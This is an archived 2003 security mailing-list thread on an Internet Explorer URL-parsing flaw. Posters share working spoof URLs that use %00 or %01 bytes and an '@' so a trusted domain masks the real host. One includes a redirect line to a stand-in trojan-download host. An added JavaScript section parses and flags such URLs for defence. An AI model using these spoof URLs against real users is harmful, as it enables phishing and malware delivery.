Full Disclosure mailing list archives
RE: RE: FWD: Internet Explorer URL parsing vulnerability
From: Rainer Gerhards <rgerhards () hq adiscon com>
Date: Wed, 10 Dec 2003 16:06:20 +0100
Just to add: http://www.microsoft.com:security%00@www.linux.org/ works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE issue... Opera at least displays a decent warning and also replaces the password part of the credentials in visible display.

Rainer

On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote:

Well, 0x00 works even better (as usual). Consider the following URL:

http://www.microsoft.com:security%00@%77w%77%2elinu%78%2eorg

This, together with a little social engineering, can do much. In my IE 6.0.2800.1106.xpsp2.03422-1633 this takes you to www.linux.org, which is also shown in the address bar. The status bar will show "www.microsoft.com:security" whenever you hover over relative links on the site (check with the news). The trick will most probably work well with fake sites that remove the address bar.

The 0x00 C string terminator often causes quite some trouble. I remember reporting a similar problem to Microsoft some months ago, then related to %00 not being correctly parsed by IIS. It was considered low risk by Microsoft and not immediately addressed (I have to admit I actually think this is at least not very high risk...). It should be addressed by now.

Back to the discussed topic: I think it is also not very clever to display credentials in the status bar. So if somebody is dumb enough to actually use URLs with credentials, I think the browser should remove them in all visible elements.

Rainer Gerhards
Adiscon

________________________________
From: VeNoMouS [mailto:venom () gen-x co nz]
Sent: Wednesday, December 10, 2003 6:03 AM
To: Julian HO Thean Swee; full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

Umm, tested this; you don't need %01 either, btw.

www.microsoft.com@www.linux.org

Was messing around with some hex style as well. Is there a way to call a file:// inside a http://? Because the issue with doing the @ trick is it appends http:// automatically. Mind you, you could just make it exec some VB code or something on a site; just a random idea anyway. And it also doesn't seem to work if you use hex for the full domain, i.e.

www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

nor

www.microsoft.com%40www.linux.org

whereas

www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

works.

----- Original Message -----
From: Julian HO Thean Swee <mailto:jho () starhub com>
To: 'full-disclosure () lists netsys com'
Sent: Wednesday, December 10, 2003 4:22 PM
Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

Hmm, it doesn't seem to work on my browser :) I don't even get transported to any page when I click the button. But then again, I have everything turned off in the internet zone by default... (but my submit non-encrypted form data is on). Does it really work then? It looks like it's using JavaScript...? (location.href)

Merry Christmas everyone :)

--__--__--

Message: 1
Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)
From: S G Masood <sgmasood () yahoo com>
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time. Most of you will realise why... ;D

The PayPal, AOL, Visa, Mastercard, et al. email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique.

> # POC ##########
> http://www.zapthedingbat.com/security/ex01/vun1.htm

Don't be surprised if your latest download from http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com');

--
S.G.Masood
Hyderabad, India

PS: One more thing - no scripting required to exploit this.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
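Every URL traded in this thread leans on the same fact: in "http://A@B" the browser connects to B and A is only userinfo, and the host B is percent-decoded before it is resolved, while an encoded "%40" is data rather than the "@" delimiter (which is why VeNoMouS's "%40" variants go nowhere). The following is an added example, not code from the thread or from any browser vendor: a small JavaScript parser that splits such URLs the way RFC 3986 section 3.2 prescribes, and a deliberately simple model of the display truncation at a %00/%01 byte that the posters report. The function names, the `displayedAuthority` model of what the browsers showed, and the benign control URL are my own assumptions.

```javascript
// Added example, not code from the thread or from any browser vendor.
// Splits "scheme://[userinfo@]host[:port]/..." per RFC 3986 section 3.2
// and models the display truncation the posters report. Names are mine.

// Percent-decode byte by byte (ASCII is enough for these host names).
function pctDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

const CONTROL = /[\x00-\x1f\x7f]/;

// Authority parsing. The userinfo ends at the last literal "@" (WHATWG
// browsers take the last one; RFC 3986 allows only one). An encoded "%40"
// is data, not a delimiter, which is why "www.microsoft.com%40www.linux.org"
// stays a single, invalid host name instead of becoming credentials.
function parseUrl(url) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):\/\/([^/?#]*)([/?#].*)?$/.exec(url);
  if (!m) return null;
  const [, scheme, authority, rest = ''] = m;
  const at = authority.lastIndexOf('@');
  const userinfo = at >= 0 ? authority.slice(0, at) : null;
  const hostport = at >= 0 ? authority.slice(at + 1) : authority;
  const colon = hostport.lastIndexOf(':');
  const rawHost = colon >= 0 ? hostport.slice(0, colon) : hostport;
  const port = colon >= 0 ? hostport.slice(colon + 1) : null;
  // Browsers percent-decode the host before resolving it, so %77%77%77 is www.
  const host = pctDecode(rawHost).toLowerCase();
  // A decoded reg-name may contain only letters, digits, "-" and "."
  // (IP literals are left out of this example).
  const hostValid =
    /^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*$/.test(host);
  return { scheme: scheme.toLowerCase(), userinfo, host, hostValid, port, rest };
}

// Assumption about the reported behaviour, not Microsoft's code: the address
// or status bar showed the decoded authority only up to the first C0 control
// byte, so "www.microsoft.com:security%00@www.linux.org" displayed as
// "www.microsoft.com:security".
function displayedAuthority(url) {
  const m = /^[a-zA-Z][a-zA-Z0-9+.-]*:\/\/([^/?#]*)/.exec(url);
  if (!m) return null;
  const decoded = pctDecode(m[1]);
  const cut = decoded.search(CONTROL);
  return cut >= 0 ? decoded.slice(0, cut) : decoded;
}

// What a mail gateway or link checker would want to know about a URL.
function assess(url) {
  const p = parseUrl(url);
  if (!p) return { parsed: false, url };
  const displayed = displayedAuthority(url);
  return {
    parsed: true,
    url,
    realHost: p.host,                 // where the browser actually connects
    hostValid: p.hostValid,
    hasUserinfo: p.userinfo !== null, // credentials in a URL: warn, as Opera does
    controlByteInUserinfo: p.userinfo !== null && CONTROL.test(pctDecode(p.userinfo)),
    displayed,
    // The phishing signal: what the user sees does not end in the real host.
    displayHidesHost: p.hostValid && !displayed.endsWith(p.host),
  };
}

// Constructed sample set: the URLs quoted in the thread plus a benign control.
const SAMPLES = [
  'http://www.microsoft.com:security%00@%77w%77%2elinu%78%2eorg',
  'http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com',
  'http://www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67',
  'http://www.microsoft.com%40www.linux.org',
  'http://www.microsoft.com/',
];

function report(urls = SAMPLES) {
  return urls.map(assess);
}

for (const r of report()) console.log(JSON.stringify(r));
```

Run with `node` and compare `realHost` against `displayed` for each sample: the two thread URLs with a control byte are the only ones where the visible authority hides the real host, the plain `@` form with a hex-encoded host still resolves to www.linux.org but shows it, and the `%40` form never parses as credentials at all. A gateway that rewrites or warns on `hasUserinfo` alone, as Opera did, already covers every variant in the thread.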
Current thread:
- RE: Re: Internet Explorer URL parsing vulnerability, (continued)
- RE: Re: Internet Explorer URL parsing vulnerability Rui Pereira (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Exibar (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Rui Pereira (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Exibar (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Kristian Hermansen (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Karlis Zigurs (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability Valdis . Kletnieks (Dec 11)
- RE: RE: FWD: Internet Explorer URL parsing vulnerability Rainer Gerhards (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Georgi Guninski (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability John Sage (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Daniel H. Renner (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Jedi/Sector One (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Valdis . Kletnieks (Dec 10)